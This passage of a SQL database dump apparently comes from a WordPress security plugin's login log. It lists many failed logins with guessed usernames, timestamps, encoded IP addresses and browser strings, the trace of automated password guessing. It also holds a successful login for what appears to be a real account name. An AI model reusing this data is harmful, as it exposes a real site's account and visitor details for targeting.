(9247, 33012, 1694685138.024516, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶£uÉ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(8916, 32002, 1693604411.357897, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(8915, 32001, 1693604410.472871, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10111, 48638, 1709606006.713348, 1, 'loginFailInvalidUsername', 'Benjude', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGìX', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10112, 48639, 1709606044.309535, 1, 'loginFailInvalidUsername', 'yanz', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY.i¯', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10113, 48640, 1709606044.909754, 1, 'loginFailInvalidUsername', 'wordpressauto', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY.i¯', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10114, 48641, 1709606080.269074, 1, 'loginFailInvalidUsername', 'azaret', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6$´N', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10137, 48884, 1709923967.378930, 1, 'loginFailInvalidUsername', 'prueba', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgš>v', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10138, 48894, 1709924008.212784, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÃôå', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14'),
(10146, 48981, 1710013862.915640, 1, 'loginFailInvalidUsername', 'demo', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*Àú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),
(10147, 48984, 1710013894.323388, 1, 'loginFailInvalidUsername', 'tester', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\r@e´', 'Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),
(10165, 49243, 1710228142.390358, 1, 'loginFailInvalidUsername', 'awen', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹«Æ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(10166, 49243, 1710228142.406545, 1, 'loginFailInvalidUsername', 'awen', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹«Æ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(10040, 47092, 1707008400.171500, 1, 'loginFailInvalidUsername', 'wwwadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-!Ù', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10167, 49248, 1710228158.336999, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÐWÎ´', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0'),
(10041, 47092, 1707008400.208593, 1, 'loginFailInvalidUsername', 'wwwadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-!Ù', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10042, 47093, 1707008400.802205, 1, 'loginFailInvalidUsername', 'administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-!Ù', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0');
INSERT INTO `wpou_wflogins` VALUES
(10043, 47094, 1707008448.404018, 1, 'loginFailInvalidUsername', 'admin6', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿh›¨½', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10044, 47095, 1707008448.433256, 1, 'loginFailInvalidUsername', 'dagon', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿh›¨½', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10045, 47096, 1707008449.662311, 1, 'loginFailInvalidUsername', 'yanz@123457', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšà4', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10033, 47081, 1706889208.226142, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\ÍÅ6', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10046, 47097, 1707008449.675904, 1, 'loginFailInvalidUsername', 'thuylt', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšà4', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10035, 47082, 1706889208.232393, 1, 'loginFailInvalidUsername', 'bimak73555', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦Ÿ|', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10034, 47083, 1706889208.236651, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦Ÿ|', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10030, 45939, 1706529520.374205, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ôÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10031, 45940, 1706529521.658057, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ôÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10032, 45941, 1706529522.934844, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ôÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10036, 47084, 1706889208.832393, 1, 'loginFailInvalidUsername', 'stender', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\ÍÅ6', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10037, 47085, 1706889247.190079, 1, 'loginFailInvalidUsername', 'wpcore', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQö', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10024, 45925, 1706437174.724388, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgkÆì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10038, 47086, 1706889247.977323, 1, 'loginFailInvalidUsername', 'server', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQö', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10022, 45828, 1706278742.727518, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯kÌ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(10025, 45926, 1706437181.440335, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgkÆì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10026, 45927, 1706437188.434720, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgkÆì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10023, 45829, 1706278826.101363, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯kÌ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(10018, 45718, 1706116374.456153, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’F¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10019, 45719, 1706116381.747591, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’F¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10020, 45720, 1706116389.237574, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’F¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10021, 45721, 1706116390.916318, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’F¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10027, 45928, 1706437192.534554, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgkÆì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10012, 45630, 1705940175.133203, 1, 'loginFailInvalidUsername', 'pajero_sports', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6&,', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9046, 32368, 1694031224.297820, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuŽ´', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8785, 31583, 1692901570.267127, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¥''', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8767, 31334, 1692606681.690849, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšB¢Ÿ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8786, 31584, 1692901576.245821, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgm°ú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8768, 31335, 1692607739.430355, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿmõÅÐ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8769, 31335, 1692607739.443982, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿmõÅÐ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8770, 31364, 1692612236.290361, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ]BCI', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8771, 31366, 1692617493.412733, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³Ðö“', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8772, 31391, 1692631648.533267, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¢ØŒ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8787, 31585, 1692901582.571619, 1, 'loginFailInvalidUsername', 'howequipmentworks', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-³ª', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8788, 31586, 1692901586.600394, 1, 'loginFailInvalidUsername', 'howequipmentworks.com!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿpN%º', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8789, 31587, 1692901606.427537, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿòQQ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9047, 32369, 1694031229.425493, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$¹ ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8782, 31580, 1692901556.789848, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òÀ‘', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8775, 31525, 1692774670.994830, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxÙS', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8783, 31581, 1692901563.018896, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg`hv', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8776, 31554, 1692801576.980506, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿHÿ3', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8773, 31395, 1692677572.137209, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgö', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8777, 31555, 1692801830.357689, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšy`', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8774, 31410, 1692720434.286634, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf°Qb', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8784, 31582, 1692901565.993052, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºwvz', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9049, 32371, 1694031235.348011, 1, 'loginFailInvalidUsername', 'happythinking!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÒ\rà', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9048, 32370, 1694031230.901041, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³BkË', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8780, 31578, 1692901548.602634, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºËìX', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8781, 31579, 1692901552.575995, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾¦wí', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8778, 31571, 1692823266.580697, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿº|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8779, 31577, 1692868068.198818, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅúæ¨', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9036, 32358, 1694031198.121982, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄÊ\Z', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9037, 32359, 1694031199.280642, 1, 'loginFailInvalidUsername', 'lovely!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²<CÏ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9038, 32360, 1694031205.217044, 1, 'loginFailInvalidUsername', 'www.happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹Æ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9039, 32361, 1694031205.697855, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¤ä>', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9040, 32362, 1694031209.206751, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃ¯=æ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9041, 32363, 1694031209.908683, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«áúò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9042, 32364, 1694031214.484861, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-¥À', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8885, 31947, 1693353076.579190, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«ìw', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8886, 31948, 1693353078.723188, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\VUk', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8887, 31949, 1693353083.704961, 1, 'loginFailInvalidUsername', 'lovely!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸÀ ±', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8888, 31950, 1693353087.109869, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉ¢~û', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8889, 31951, 1693353090.641839, 1, 'loginFailInvalidUsername', 'happythinking.com!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½ºWE', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8890, 31952, 1693389111.658464, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)kD', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8891, 31953, 1693389115.830978, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½Ùe€', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8892, 31954, 1693389134.834346, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgºI\\', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8893, 31955, 1693389143.538264, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ<óyÐ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8894, 31956, 1693389146.861653, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿRÕ\ZM', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8895, 31957, 1693389150.074194, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgZÏª', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8896, 31958, 1693389155.019382, 1, 'loginFailInvalidUsername', '*ce4f703eebc8e3bf98e6f776506fb5151e666377!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òÃ*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8897, 31959, 1693389158.848872, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ñó', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8956, 32050, 1693618824.608063, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´$ÙÏ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8957, 32051, 1693618843.464102, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$EX', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8857, 31918, 1693331026.576833, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇöÞ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(8858, 31919, 1693331028.488194, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇöÞ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(8853, 31862, 1693243811.456844, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¬¬nÖ', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'),
(8854, 31863, 1693243814.447698, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¬¬nÖ', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'),
(8855, 31916, 1693324268.886367, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQÄwI', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8859, 31922, 1693352948.084881, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-®•Ò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8860, 31923, 1693352951.850545, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6/ž', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8861, 31924, 1693352955.293379, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¸xR', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8862, 31925, 1693352960.035877, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿUiæ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8863, 31926, 1693352963.380534, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"\rž', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8864, 31927, 1693352966.858217, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÃ:X', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8865, 31928, 1693352972.310740, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1Ìè', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
